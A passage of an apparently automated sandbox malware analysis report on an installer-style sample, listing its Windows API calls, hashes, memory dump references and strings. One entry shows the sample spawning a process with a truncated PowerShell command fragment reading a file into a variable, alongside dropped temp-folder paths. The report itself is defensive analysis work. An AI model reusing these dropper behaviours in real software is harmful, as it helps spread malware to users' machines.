                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                          • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                          • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                          • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                          Function 00406113 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                          • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                          • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                          Function 004015C2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                          • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                          • Opcode Fuzzy Hash: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                          • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                          Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 0040438B
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                          • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                          • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                          • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                          Function 00404362 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                          • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                          • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                          • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                          Function 00405969 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ExecuteShell
                          • String ID:
                          • API String ID: 587946157-0
                          • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                          • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                          • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                          • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                          Function 00403390 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                          • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                          • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                          • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                          Function 0040434F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                          Download Yara Rule
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID:
                          • API String ID: 2492992576-0
                          • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                          • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                          • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                          • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                          Function 00401FA0 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                            • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                            • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                            • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Lotteris=gc -raw ',"$Lotteris=gc -raw ',?, for va",00000000), ref: 0040594F
                            • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                            • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                            • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                            • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                          • String ID:
                          • API String ID: 2972824698-0
                          • Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                          • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                          • Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                          • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE

                          Non-executed Functions

                          Function 00404805 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 252stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                          • SetWindowTextA.USER32(00000000), ref: 00404838
                          • SHBrowseForFolderA.SHELL32(?,?,?,?,00429860,?,?,00000014,?,?,00000001,?,?,?,?,000003FB), ref: 004048E9
                          • CoTaskMemFree.OLE32(00000000,?,?,?,00429860,?,?,00000014,?,?,00000001,?,?,?,?,000003FB), ref: 004048F4
                          • lstrcmpiA.KERNEL32(Remove folder: ,0042A488), ref: 00404926
                          • lstrcatA.KERNEL32(?,Remove folder: ,?,?,?,?,00429860,?,?,00000014,?,?,00000001,?), ref: 00404932
                          • SetDlgItemTextA.USER32(?,000003FB), ref: 00404944
                            • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                          • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?,?,00000014), ref: 00404A02
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                            • Part of subcall function 00405C1F: lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                            • Part of subcall function 00405C1F: CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                            • Part of subcall function 00405C1F: lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                          • SetDlgItemTextA.USER32(00000000,00000400,00429448), ref: 00404AAF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Char$ItemNextText$Freelstrcat$BrowseDiskFolderPrevSpaceTaskWindowlstrcmpilstrlen
                          • String ID: A$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Remove folder:
                          • API String ID: 326488526-3947683311
                          • Opcode ID: e2e84c6a26e19a8dedc43b182c38c662e0fd0fd58dd502147bd47aad6c024144
                          • Instruction ID: 0ed023ad5a6041dbbe712cf1cd1bcdfebaf78e19e7ba4d6f6a4a431d05d4e923
                          • Opcode Fuzzy Hash: e2e84c6a26e19a8dedc43b182c38c662e0fd0fd58dd502147bd47aad6c024144
                          • Instruction Fuzzy Hash: A9918EF1A00209AADB11AFA5CD45BAFB6B8AF84314F14807BF611B62D1D77889418F6D
                          Function 00402198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                          Strings
                          • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene, xrefs: 0040225D
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene
                          • API String ID: 123533781-929867550
                          • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                          • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                          • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                          • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                          Function 004027CF Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                          • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                          • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                          • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                          Function 00406AFA Relevance: .3, Instructions: 334COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                          • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                          • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                          • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                          Function 00407318 Relevance: .3, Instructions: 271COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
